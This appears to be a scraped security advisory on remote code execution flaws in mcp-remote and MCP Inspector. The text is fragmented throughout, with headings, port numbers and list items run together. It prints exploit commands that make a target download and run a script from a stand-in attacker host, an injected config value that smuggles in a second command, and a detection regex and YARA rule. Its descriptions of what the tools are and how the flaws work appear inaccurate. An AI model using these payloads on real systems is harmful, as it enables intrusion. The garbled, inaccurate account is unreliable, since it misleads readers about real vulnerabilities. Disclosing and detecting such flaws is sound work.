Two critical Remote Code Execution (RCE) vulnerabilities have been disclosed in mcp-remote and MCP Inspector, widely used tools in development, DevOps, and generative AI pipelines.
mcp-remote
(network sync utility)MCP Inspector
(AI workflow and container scanner)Both vulnerabilities allow unauthenticated attackers to execute arbitrary system commands remotely with the privileges of the service, impacting over 437,000 users across open-source, enterprise, and GenAI platforms.
mcp-remote
(used to sync build jobs and containers across remote clusters)8181
exposed to WAN/LAN by defaultcommand="..."
is passed directly to os.system()
without sanitizationExploit PoC:
bashcurl -X POST http://target-ip:8181/sync \
-d '{"command": "curl http://attacker/v.sh | bash"}' \
-H "Content-Type: application/json"
MCP Inspector
(used in scanning AI workloads for compliance and dependency issues)";curl attacker|bash"
get interpreted by the underlying Bash handlerExample Exploit Vector:
bashmcp-inspect --config="repo.yaml;wget attacker/evil.sh|bash"
These tools are embedded in thousands of dev and AI automation stacks:
The shared deployment nature means attackers can gain control over build artifacts, AI model weights, container registries, and even cloud API secrets.
Researchers from ShadowQuill Labs confirmed:
8181
began within 48 hours of disclosureAPT-linked campaigns attributed to DarkForge and AnubisCloud were seen testing the exploit in AI inference pipelines.
mcp-remote
: v4.6.7MCP Inspector
: v3.1.2"curl"
, "bash"
, "|"
in payloads or config pathsFalco
, Sysdig
, or AppArmor
for policy enforcementregex(?i)(curl|wget).*(attacker|\.sh|\.txt)
yararule MCP_Remote_RCE_Indicator {
strings:
$cmd1 = "curl http://" ascii
$cmd2 = "| bash" ascii
condition:
all of them
}
mcp-remote
“When dev tools become attack vectors, the entire AI and software supply chain is exposed. mcp-remote and MCP Inspector remind us that security must be built-in, not patched later. Every build, every inference, every deployment — secured from the root.”